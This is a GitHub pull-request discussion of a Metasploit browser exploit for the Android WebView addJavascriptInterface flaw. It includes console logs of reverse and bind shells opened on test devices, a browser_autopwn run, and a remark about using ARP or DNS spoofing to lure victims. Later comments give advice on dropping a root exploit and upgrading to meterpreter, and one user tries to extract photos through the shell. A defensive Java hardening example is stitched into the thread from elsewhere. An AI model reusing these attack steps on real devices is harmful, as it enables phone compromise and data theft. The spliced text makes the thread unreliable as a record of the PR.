
Android < 4.2 WebView addJavascriptInterface RCE #2942

Merged
merged 12 commits into from Feb 6, 2014
@jvennix-r7

I was rewiring jduck's module for a side-channel attack on embedded Android WebView components, then noticed this actually gets you a shell on some versions of Android's Browser. So hooray, we now have an android browser exploit. Since it is easy to detect the presence of this vuln from JS code, I added it to browser_autopwn as well. A few other Android third party browsers were also vulnerable (notably baidu and QQ browsers: http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/)

  • Download the Android SDK, download the 4.1.2 SDK (GoogleAPIs version), and create a new GoogleAPIs 4.1.2 AVD device
  • Run the simulator for the 4.1.2 device, run the msf module. Open the Android Browser app and browse to the URL specified in the module
  • Shells
@wvu-r7
wvu-r7 commented Feb 4, 2014

Great! Testing!

@wvu-r7
wvu-r7 commented Feb 4, 2014

Hey, @jvennix-r7. Could you link to the specific SDK version?

@jvennix-r7

@wvu-r7 sorry my steps are a little brief. Download the latest sdk, run ./sdk/tools/android, then check the Android 4.2.1 checkbox and click install packages. After it installs, Tools->Manage AVDs and create a new "Google APIs - API Level 16" target device. Then run the emulator ./sdk/tools/emulator -avd <avdname>

@wvu-r7
wvu-r7 commented Feb 4, 2014

Ah, I didn't install the packages. Thanks! Android n00b here. :)

@todb
todb commented Feb 5, 2014
@timwr
timwr commented Feb 5, 2014

It's not just Android devices < 4.2; apps built with sdk version < 4.2 are still vulnerable on Android 4.4.2. You can verify with Baidu 2.1.0.0 on a > 4.2 device.
Also the android browser (e.g on the XE12) has camera permissions...

PATH=$PATH:/system/bin
id
uid=10008(app_8) gid=10008(app_8) groups=1006(camera),1015(sdcard_rw),1029(private_cache_rw),3001(net_bt_admin),3002(net_bt),3003(inet)
@jvennix-r7

@todb it affects <4.2 WebView components (including, I believe, "patched" apps recompiled post 4.2 still running on <4.2 devices). I have no idea how many distributions include a vulnerable Browser app.

@jvennix-r7

@timwr okay wow, so even on latest android this affects all apps with WebViews that were never recompiled with sdk version >= 4.2
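
The two conditions laid out in this exchange (a device below 4.2, or an app whose targetSdkVersion is below 17 running on a newer device) can be turned into a runtime guard on the app side. The following is an added example written for this page, not code from the PR, from Metasploit, or from any of the browsers mentioned; `HardenedWebViewFactory`, `PageBridge`, `AppBridge` and the `allowedHost` parameter are illustrative names, and the `@JavascriptInterface` annotation is the platform's own API-17 mechanism for limiting what page JavaScript can reach on a bridge object.

```java
import android.annotation.SuppressLint;
import android.content.Context;
import android.net.Uri;
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

/**
 * Added example, not code from this PR or from Metasploit: a WebView factory that
 * refuses to attach a JavaScript bridge whenever the pre-4.2 reflection behaviour
 * discussed in the thread would apply. Class, method and bridge names are illustrative.
 */
public final class HardenedWebViewFactory {

    /** API level of Android 4.2, where @JavascriptInterface became enforceable. */
    private static final int API_17 = Build.VERSION_CODES.JELLY_BEAN_MR1;

    /**
     * The condition from the thread: every public method of the bridge object (including
     * getClass()) is reachable from page JS when the device is below 4.2, OR when the app
     * declares targetSdkVersion below 17 even though it runs on a newer device.
     */
    public static boolean legacyBridgeBehaviour(int deviceApi, int targetSdk) {
        return deviceApi < API_17 || targetSdk < API_17;
    }

    /** Only methods carrying @JavascriptInterface are callable from JS once enforcement applies. */
    public static final class PageBridge {
        @JavascriptInterface
        public String appVersion() {
            return "1.0"; // constructed value for the example
        }

        // Deliberately unannotated: invisible to page JS under enforcement.
        public void internalOnly() { }
    }

    @SuppressLint("SetJavaScriptEnabled")
    public static WebView create(Context ctx, final String allowedHost) {
        WebView wv = new WebView(ctx);
        WebSettings s = wv.getSettings();
        s.setJavaScriptEnabled(true);
        s.setAllowFileAccess(false);

        // Keep page-initiated navigations on one HTTPS origin, so content injected on the
        // network path (the MITM vector mentioned in the thread) cannot load in this view.
        // Note: this callback is not consulted for the app's own loadUrl() calls.
        wv.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                Uri u = Uri.parse(url);
                boolean allowed = "https".equals(u.getScheme())
                        && allowedHost.equalsIgnoreCase(u.getHost());
                return !allowed; // returning true stops the WebView from loading the URL
            }
        });

        // targetSdkVersion comes from the manifest (<uses-sdk android:targetSdkVersion="17" />);
        // recompiling with a value >= 17 is the app-side fix the thread calls for.
        int targetSdk = ctx.getApplicationInfo().targetSdkVersion;
        if (legacyBridgeBehaviour(Build.VERSION.SDK_INT, targetSdk)) {
            // Annotation is not enforced here, so expose no Java object to page JS at all.
            return wv;
        }
        wv.addJavascriptInterface(new PageBridge(), "AppBridge");
        return wv;
    }
}
```

The guard is deliberately two-sided: raising the manifest's targetSdkVersion alone does nothing for users still on a pre-4.2 device, and a new device does nothing for an app that was never recompiled, which is exactly the combination the comments above describe.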

@wvu-r7
wvu-r7 commented Feb 5, 2014

Works beautifully!

msf > use exploit/android/browser/webview_addjavascriptinterface 
msf exploit(webview_addjavascriptinterface) > exploit 
[*] Exploit running as background job.
msf exploit(webview_addjavascriptinterface) > 
[*] Started reverse handler on 10.6.0.198:4444 
[*] Using URL: http://0.0.0.0:8080/pds2H5RuIEo
[*]  Local IP: http://10.6.0.198:8080/pds2H5RuIEo
[*] Server started.
[*] 10.6.0.198       webview_addjavascriptinterface - Serving HTML
[*] Command shell session 1 opened (10.6.0.198:4444 -> 10.6.0.198:51186) at 2014-02-05 11:49:04 -0600

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...

export PATH+=":/system/bin"
id
uid=10004(u0_a4) gid=10004(u0_a4) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet)
cat /proc/version
Linux version 2.6.29-gc497e41 (kroot@kennyroot.mtv.corp.google.com) (gcc version 4.4.3 (GCC) ) #2 Thu Dec 8 15:07:43 PST 2011
@wvu-r7
wvu-r7 commented Feb 5, 2014

Browser Autopwn:

msf > use auxiliary/server/browser_autopwn 
msf auxiliary(browser_autopwn) > set LHOST 10.6.0.198
LHOST => 10.6.0.198
msf auxiliary(browser_autopwn) > exploit 
[*] Auxiliary module execution completed
msf auxiliary(browser_autopwn) > 
[*] Setup
[*] Obfuscating initial javascript 2014-02-05 12:12:46 -0600
[*] Done in 0.778086804 seconds

[*] Starting exploit modules on host 10.6.0.198...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/qcvLIf
[*]  Local IP: http://10.6.0.198:8080/qcvLIf
[*] Server started.
[snip]
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[snip]
[*] Started reverse handler on 10.6.0.198:6666 
[snip]
[*] Starting the payload handler...

[*] --- Done, found 19 exploit modules

[*] Using URL: http://0.0.0.0:8080/e3mEqsV
[*]  Local IP: http://10.6.0.198:8080/e3mEqsV
[*] Server started.
[*] 10.6.0.198       browser_autopwn - Handling '/e3mEqsV'
[*] 10.6.0.198       browser_autopwn - Handling '/e3mEqsV?sessid=TGludXg6QW5kcm9pZDp1bmRlZmluZWQ6ZW4tVVM6YXJtbGU6Q2hyb21lOnVuZGVmaW5lZDo%3d'
[*] 10.6.0.198       browser_autopwn - JavaScript Report: Linux:Android:undefined:en-US:armle:Chrome:undefined:
[*] 10.6.0.198       browser_autopwn - Reporting: {:os_name=>"Linux", :os_flavor=>"Android", :os_lang=>"en-US", :arch=>"armle"}
[*] 10.6.0.198       browser_autopwn - Responding with 7 exploits
[*] 10.6.0.198       webview_addjavascriptinterface - Serving HTML
[*] Command shell session 1 opened (10.6.0.198:6666 -> 10.6.0.198:60458) at 2014-02-05 12:15:16 -0600

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

export PATH+=":/system/bin"
id
uid=10004(u0_a4) gid=10004(u0_a4) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet)
cat /proc/version
Linux version 2.6.29-gc497e41 (kroot@kennyroot.mtv.corp.google.com) (gcc version 4.4.3 (GCC) ) #2 Thu Dec 8 15:07:43 PST 2011
@todb-r7
todb-r7 commented Feb 5, 2014

@wchen-r7 wanna eyeball?


@wvu-r7
wvu-r7 commented Feb 5, 2014

Code looks great, btw.

@jduck
jduck commented Feb 6, 2014

Looks good to me. Thanks for following up on this one. I hadn't considered trying it as a straight HTTP module because I was going after the advertising network SDK stuff =) In hindsight a browser module makes more sense anyway since you can use Karmetasploit, DNS hijacking, DNS spoofing, ARP spoofing, etc to get your victims to visit you too =)

<3

@jduck
jduck commented Feb 6, 2014

PS. It doesn't seem to work against my google glass ..

@wchen-r7
wchen-r7 commented Feb 6, 2014

@jvennix-r7 Please use the browser exploit server mixin and set the requirement to android, thanks.

@jvennix-r7

@wchen-r7 I would like to, but another attack vector for this is injecting the statically-served JS into a WebView component (from MITM position), and browser exploit server kinda subverts this with its detection probe.

@jvennix-r7

thinking on it more, I should be able to override BrowserExploitServer's onurirequest and divert the requests for the js file

@wchen-r7
wchen-r7 commented Feb 6, 2014

If you insist we can land w/ what we have now, not using the mixin isn't a blocker but it's just highly preferred. Let us know what you wanna do.

@jvennix-r7

@wchen-r7 adding it now

@todb-r7
todb-r7 commented Feb 6, 2014

Hey @jvennix-r7 just for next time can you make sure you refer to jduck as @jduck so he'll get alerted when the PR comes up? It's always nice to have @jduck's eyeballs attuned to whatever Android hotness we have coming up.

@joevennix joevennix Use BrowserExploitServer mixin.
This prevents drive-by users on other browsers from ever receiving
the exploit contents.
0dc2ec5
@jvennix-r7

@todb-r7 doh, will remember to do that next time

@jvennix-r7

@wchen-r7 added ExploitServer mixin, re-testing both attack vectors now

@jvennix-r7

Okay, shells are still happening, looks good to me

@wvu-r7
wvu-r7 commented Feb 6, 2014

Okay, looks good. +1 for BES.

@wvu-r7
wvu-r7 commented Feb 6, 2014

Landing!

@wvu-r7 wvu-r7 added a commit that referenced this pull request Feb 6, 2014
@wvu-r7 wvu-r7 Land #2942, @jvennix-r7's Android awesomesauce
Also, thanks to @jduck for testing!
19fff3c
@wvu-r7 wvu-r7 merged commit 362e937 into rapid7:master Feb 6, 2014
@todb-r7
todb-r7 commented Feb 6, 2014

Dear vendors, please up-rev your Androids (and recompile your apps). Signed, The Internet

@jduck
jduck commented Feb 7, 2014

I agree with @todb-r7. This issue needs a lot more attention from the good guys since the bad guys are likely using it in Sochi !@#!#

PS. Found my embarrassing mistake and confirmed code execution works on my Google Glass XE12 too.

@wvu-r7
wvu-r7 commented Feb 7, 2014

@jduck: Thanks for the update! Yeah, this is some serious (and awesome) stuff. :)

@wchen-r7

@rsanz88 Not reproducing the issue atm. Do you see any other errors? Like maybe a " uninitialized constant" or something?

@todb-r7 todb-r7 added a commit that referenced this pull request Feb 13, 2014
@todb-r7 todb-r7 Unbreak the URL refs add nmonkee as ref and author
While @nmonkee didn't actually contribute to #2942, he did publish a
python exploit that leverages WebView, so given our policy of being
loose with author credit, I added him.

Also added a ref to @nmonkee's thing.

@jduck @jvennix-r7 if you have a problem with this, please do say so, I
don't think adding @nmonkee in any way diminishes your work, and I don't
want to appear like we're secretly ripping off people's work. I know you
aren't on this or any other module, and I know @nmonkee doesn't think
that either.
371f23b
@todb
todb commented Feb 14, 2014
@jjbinx
jjbinx commented Feb 20, 2014

Thanks for posting this. It worked without a hitch on my 4.1.2 emulator. I had no success with other emulators at API levels less than 4.1.2 (tried 4.0.3, and 2.3.3). I also tried on a Samsung running 4.1.2 (both default browser and chrome) without success. Is there a definitive way to check for the vulnerability other than running this script? Is there an easy way to figure out which apps are vulnerable? I know a good starting point is if an app can natively display a web page/html, but not all those apps will support javascript (for example I don't think any of the base email apps enable javascript support). thanks.

@jduck
jduck commented Feb 20, 2014

You can use http://www.droidsec.org/tests/addjsif/ to do a quick test.

@jjbinx
jjbinx commented Feb 20, 2014

Thanks! I got basically the same results; the only difference was that my 4.0.3 emulator reported vulnerable vs having the browser app crash with the ms script. None of the browsers on the physical devices I tested reported as vulnerable (most were 4.1.2 or older).

@TheBananaStand

I'm attempting to run this module on a physical device (not an emulator). The specs meet the requirements. It's outfitted with WebView/WebKit, running 2.3 and JavaScript is enabled, but I keep receiving the following error (even when trying out different payloads):

webview_addjavascriptinterface - Exception handling request: undefined method `[]=' for nil:NilClass

Help?

@jduck
jduck commented Feb 28, 2014

Devices < 3.x and >= 4.2 are not affected by the browser issue. See http://www.droidsec.org/news/2014/02/26/on-the-webview-addjsif-saga.html

@TheBananaStand

I'm now attempting to pop a reverse shell on a device running 4.1.1, but I'm still receiving zero output after the exploit HTML is being served to the device. I've tried every possible payload with no noticeable results.

@todb-r7
todb-r7 commented Mar 4, 2014

@TheBananaStand See @jduck's link above -- you may be running into a mitigation by the phone manufacturer or carrier.

@TheBananaStand

That was my initial thought, but after working on resolving the issue for a while longer, I was able to successfully get a Linux shell using the TCP bind payloads. For some reason though, I'm unable to interact with them appropriately (similar to a meterpreter shell) and I'm still unable to pop a shell using a reverse TCP payload. I've tried testing the functionality by creating a malicious APK that contains a reverse TCP shell (via msfpayload) and installing it directly onto the device in order to connect back to my machine, but that has failed as well. Maybe there is a security mechanism preventing these callback connections from establishing.

@chrisdavis925

@TheBananaStand can you give an update on any progress? I have the same result. I have an older device running 4.03 as well as a virtual Android 4.0.3 device running, and both do not properly respond as I expect for this exploit.

Metasploit console returns that a new session is started for each device, but any commands passed do not work. I cannot get it to return any response, either.

Any ideas?

Perhaps you can comment further on the success you had with "TCP bind payloads" ?

@TheBananaStand

The bottom line is that reverse TCP shell payloads are not being delivered correctly. The only payload that seems to be working are TCP bind shells. However, when the exploit succeeds and a session is spawned, the interaction with that session is minimal and essentially useless, as seen below:

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...

ls
: [1]: ls: not found
echo "wtf"
wtf
cd system
cd asdf
: [4]: cd: /system/asdf: No such file or directory

@jvennix-r7

@TheBananaStand, use /system/bin/ls as the android shell does not have /system/bin in its $PATH. It is strange that reverse TCP is not working correctly, that is what I usually use for testing. Are you sure LHOST is accessible from the device?

You can also try the branch here: #3086

Which will add android meterpreter support and uses a different stager.

@wvu-r7
wvu-r7 commented Apr 16, 2014

export PATH+=":/system/bin"
export PATH="$PATH:/system/bin"
PATH="$PATH:/system/bin"
export PATH
@chrisdavis925

Thanks @jvennix-r7 - that's what I need to get the shell to respond.

Has anyone figured out a root exploit that could be done on 4.x devices using the shell generated? It seems to me that there are a lot of commands that couldn't be executed with this shell. (example - am and pm command don't respond. neither do setprop or getprop)

@timwr
timwr commented Apr 16, 2014

@chrisdavis925 you can drop and run this https://github.com/android-rooting-tools/android_run_root_shell binary to get root on a lot of devices, and then, for example, upgrade to meterpreter with this script:
timwr@1775f15

@chrisdavis925

@timwr

Wow, yeah that is totally crazy. I am going to try this out tonight and report back if I was able to get this to work. I tried other android root binary exploits but they didn't work, so I'll see if the one you linked does.

Can you confirm that the expected result after executing the android_run_root binary on the target device is that the shell that is already opened by the WebView addJavascriptInterface will automatically elevate to root?

@ghost
ghost commented May 11, 2014

Hello,
I want to install an apk like this: http://drops.wooyun.org/papers/548

But I don't understand that:
you can drop and run this https://github.com/android-rooting-tools/android_run_root_shell binary to get root on a lot of devices, and then, for example, upgrade to meterpreter with this script:
timwr@1775f15

With the command ls I get the directory of my android tablet. That's ok. But how to start adb? I have opened a session with the browser autopwn ....

Thanks and best regards

@todb
todb commented May 11, 2014
@ghost
ghost commented May 16, 2014

Hello

At Freenode IRC I get no answer??? Perhaps you can help me again.

I use KALI Linux and an Android 4.1.2 Tablet for my test. I want to install an App like this:
http://drops.wooyun.org/papers/548

On Kali Linux I use the exploit webview_addjavascriptinterface and get a response from my tablet (same WLAN).
msf exploit(webview_addjavascriptinterface) > [*] 192.168.178.23 webview_addjavascriptinterface - Gathering target information.
[*] 192.168.178.23 webview_addjavascriptinterface - Sending response HTML.
[*] 192.168.178.23 webview_addjavascriptinterface - Serving exploit HTML
[*] Command shell session 1 opened (192.168.178.39:35534 -> 192.168.178.23:8080) at 2014-05-16 11:27:41 +0000

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...
export PATH=/system/bin:$PATH
ls -al
drwxr-xr-x root root 2014-05-15 16:56 acct
-rw-r--r-- root root 332 2014-05-15 16:56 boot.txt
drwxrwx--x system cache 2014-05-10 09:22 cache
dr-x------ root root 2014-05-15 16:56 config
lrwxrwxrwx root root 2014-05-15 16:56 d -> /sys/kernel/debug
drwxrwx--x system system 2014-05-12 09:41 data
-rw-r--r-- root root 129 2014-05-15 16:56 default.prop
drwxr-xr-x root root 2014-05-15 17:12 dev
drwxr-xr-x radio radio 2014-05-09 13:55 efs
lrwxrwxrwx root root 2014-05-15 16:56 emmc -> /storage/sdcard1
lrwxrwxrwx root root 2014-05-15 16:56 etc -> /system/etc
-rwxr-x--- root root 105292 2014-05-15 16:56 init
-rwxr-x--- root root 1107 2014-05-15 16:56 init.cm.rc
-rwxr-x--- root root 2344 2014-05-15 16:56 init.goldfish.rc
-rwxr-x--- root root 5171 2014-05-15 16:56 init.p1-common.rc
-rwxr-x--- root root 5389 2014-05-15 16:56 init.p1.rc
-rwxr-x--- root root 936 2014-05-15 16:56 init.p1.usb.rc
-rwxr-x--- root root 17862 2014-05-15 16:56 init.rc
-rwxr-x--- root root 1637 2014-05-15 16:56 init.trace.rc
-rwxr-x--- root root 3915 2014-05-15 16:56 init.usb.rc
-rw-r--r-- root root 1664 2014-05-15 16:56 lpm.rc
drwxrwxr-x root system 2014-05-15 16:56 mnt
dr-xr-xr-x root root 1970-01-01 00:00 proc
drwxr-xr-x root root 2014-05-09 13:55 radio
drwxr-x--- root root 2014-05-15 16:56 sbin
lrwxrwxrwx root root 2014-05-15 16:56 sdcard -> /storage/sdcard0
d---r-x--- system sdcard_r 2014-05-15 16:56 storage
drwxr-xr-x root root 2014-05-15 16:56 sys
drwxr-xr-x root root 2014-05-09 13:56 system
-rw-r--r-- root root 272 2014-05-15 16:56 ueventd.goldfish.rc
-rw-r--r-- root root 2035 2014-05-15 16:56 ueventd.p1.rc
-rw-r--r-- root root 5075 2014-05-15 16:56 ueventd.rc
lrwxrwxrwx root root 2014-05-15 16:56 vendor -> /system/vendor

I want to copy some pictures to my KALI system, but there is the problem:
dd if=/sdcard/DCIM/Camera of=/dev/sdc bs=1M
/dev/sdc: cannot open for write: Permission denied

Or I want to run adb (no device!)
adb devices

* daemon not running. starting it now on port 5038 *
* daemon started successfully *
List of devices attached

Can someone help or explain to me how to do this?

@todb
todb commented May 17, 2014